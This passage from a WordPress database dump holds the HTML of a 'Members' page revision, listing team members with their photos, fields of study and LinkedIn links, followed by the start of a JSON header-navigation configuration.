93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c196-outer\">\n            <div data-colibri-id=\"182-c196\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c196 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c197\" class=\"d-block style-913 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c197-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c197-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-global-transition-all h-heading style-914 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c198\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-915 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c200-outer\">\n            <div data-colibri-id=\"182-c200\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c200 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c201\" class=\"d-block style-913 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c201-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c201-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-global-transition-all h-heading style-914 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c202\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"h-text h-text-component style-915 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c204\" class=\"style-917 style-local-182-c204 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c205-outer\">\n            <div data-colibri-id=\"182-c205\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c205 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c206\" class=\"d-block style-913 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c206-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c206-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-global-transition-all h-heading style-914 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c207\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"h-text h-text-component style-915 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c209\" class=\"style-917 style-local-182-c209 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"d-block style-913 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c211-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c211-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c212\" class=\"h-global-transition-all h-heading style-914 style-local-182-c212 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c212\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c213\" class=\"h-text h-text-component style-915 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c214\" class=\"style-917 style-local-182-c214 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c215-outer\">\n            <div data-colibri-id=\"182-c215\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c215 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c216\" class=\"d-block style-913 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-913-image style-local-182-c216-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c216-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c217\" class=\"h-global-transition-all h-heading style-914 style-local-182-c217 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c217\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c218\" class=\"h-text h-text-component style-915 style-local-182-c218 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c219\" class=\"style-917 style-local-182-c219 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c220-outer\">\n            <div data-colibri-id=\"182-c220\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c220 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c221\" class=\"d-block style-913 style-local-182-c221 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-913-image style-local-182-c221-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c221-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c222\" class=\"h-global-transition-all h-heading style-914 style-local-182-c222 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c222\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c223\" class=\"h-text h-text-component style-915 style-local-182-c223 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c224\" class=\"style-917 style-local-182-c224 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',182,'https://gsudice.dataconn.net/?p=1878',0,'revision','',0),(1879,1,'2024-11-14 09:48:38','2024-11-14 14:48:38','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"